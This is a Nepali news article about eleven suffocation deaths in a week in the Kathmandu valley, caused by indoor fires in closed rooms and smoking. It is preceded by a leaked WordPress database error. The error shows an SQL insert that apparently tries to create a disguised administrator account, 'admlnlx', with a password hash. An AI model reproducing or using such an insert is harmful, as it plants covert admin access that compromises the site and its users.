WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B3O5gMvuYEWJM416g2Etv/zeOJUOg2.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-25 07:27:06', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस १०-
काठमाडौं उपत्यकामा एक सातामा निसासिएर ११ जनाको मृत्यु भएको छ । चिसो भएका कारण कोठा भित्र आगो ताप्दा, झ्याल ढोका थुनेर सुत्दा र अत्यधिक चुरोट सेवन गर्दा ती व्यक्तिको मृत्यु भएको हो ।
घरभित्र झ्याल ढोका थुनेर बस्दा अक्सिजनको कमी हुने र निसासिर मृत्यु हुने गरेको प्रहरीले जनाएको छ । प्रहरी समाचार कक्षले जनाएअनुसार शुक्रबार भक्तपुर नगरपालिका ७ स्थित सिद्धि सालिकराम जेष्ठ नागरिक आश्रममा बस्दै आएका भारत कोलकताका गौतम बशुको बेहोस भएर मृत्यु भयो ।
कोठामै अचानक बेहोस भएपछि उनलाई उपचारका लागि नजिकैकै अस्पताल लगियो । र, उपचारकै क्रममा उनको मृत्यु भयो । प्रहरीका अनुसार लामो समय आगो तापेर बसेका कारण उनको मृत्यु भएको हो ।
उनीजस्तै ११ जनाको यस्तै कारण मृत्यु भइसकेको छ । राजधानी दैनिकमा खबर छ ।